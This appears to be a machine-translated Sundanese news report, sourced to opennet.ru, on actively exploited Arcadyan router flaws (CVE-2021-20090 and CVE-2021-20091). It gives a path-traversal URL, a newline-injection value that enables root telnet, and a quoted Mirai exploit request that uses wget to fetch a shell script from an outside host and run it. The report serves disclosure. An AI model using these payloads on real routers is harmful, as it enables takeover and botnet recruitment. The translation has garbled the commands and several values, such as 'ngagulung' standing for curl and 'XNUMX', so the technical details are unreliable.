Serangan masif parantos kacatet dina jaringan ngalawan router bumi anu firmware ngagunakeun palaksanaan server HTTP ti perusahaan Arcadyan. Pikeun meunang kadali kana alat, kombinasi dua kerentanan dianggo anu ngamungkinkeun palaksanaan jauh kode sawenang-wenang sareng hak akar. Masalahna mangaruhan rupa-rupa router ADSL anu cukup lega ti Arcadyan, ASUS sareng Munding, ogé alat anu disayogikeun dina merek Beeline (masalahna dikonfirmasi dina Smart Box Flash), Deutsche Telekom, Oranyeu, O2, Telus, Verizon, Vodafone sareng operator telekomunikasi séjén. Perhatikeun yén masalahna parantos aya dina firmware Arcadyan langkung ti 10 taun sareng salami ieu parantos junun migrasi ka sahenteuna 20 model alat tina 17 pabrik anu béda.
Kerentanan munggaran, CVE-2021-20090, ngamungkinkeun pikeun ngaksés naskah antarmuka wéb tanpa auténtikasi. Intina kerentanan nyaéta yén dina antarmuka wéb, sababaraha diréktori dimana gambar, file CSS sareng skrip JavaScript dikirim tiasa diaksés tanpa auténtikasi. Dina hal ieu, diréktori anu aksés tanpa auténtikasi diidinan dipariksa nganggo masker awal. Nangtukeun "../" karakter dina jalur pikeun buka diréktori indungna diblokir ku firmware, tapi ngagunakeun kombinasi "..% 2f" ieu skipped. Ku kituna, kasebut nyaéta dimungkinkeun pikeun muka kaca ditangtayungan nalika ngirim requests kawas "http://192.168.1.1/images/..%2findex.htm".
Kerentanan kadua, CVE-2021-20091, ngamungkinkeun pangguna anu dioténtikasi pikeun ngarobih setélan sistem alat ku ngirim parameter anu diformat khusus kana skrip apply_abstract.cgi, anu henteu mariksa ayana karakter baris anyar dina parameter. . Salaku conto, nalika ngalakukeun operasi ping, panyerang tiasa netepkeun nilai "192.168.1.2%0AARC_SYS_TelnetdEnable=1" dina widang kalayan alamat IP anu dipariksa, sareng skrip, nalika nyiptakeun file setélan /tmp/etc/config/ .glbcfg, bakal nulis garis "AARC_SYS_TelnetdEnable=1" kana eta ", nu ngaktifkeun server telnetd, nu nyadiakeun aksés cangkang paréntah unrestricted kalawan hak root. Nya kitu, ku netepkeun parameter AARC_SYS, anjeun tiasa ngaéksekusi kode naon waé dina sistem. Kerentanan munggaran ngamungkinkeun pikeun ngajalankeun skrip masalah tanpa auténtikasi ku ngaksésna salaku "/images/..%2fapply_abstract.cgi".
Pikeun ngamangpaatkeun kerentanan, panyerang kedah tiasa ngirim pamundut ka port jaringan dimana antarmuka wéb dijalankeun. Ditilik ku dinamika panyebaran serangan, seueur operator ngantunkeun aksés kana alatna tina jaringan éksternal pikeun nyederhanakeun diagnosis masalah ku jasa dukungan. Upami aksés ka antarmuka ngan ukur dugi ka jaringan internal, serangan tiasa dilakukeun tina jaringan éksternal nganggo téknik "DNS rebinding". Kerentanan ayeuna parantos aktip dianggo pikeun nyambungkeun router ka botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Sambungan: tutup Agén-Pamaké: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; ngagulung + -O + http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
sumber: opennet.ru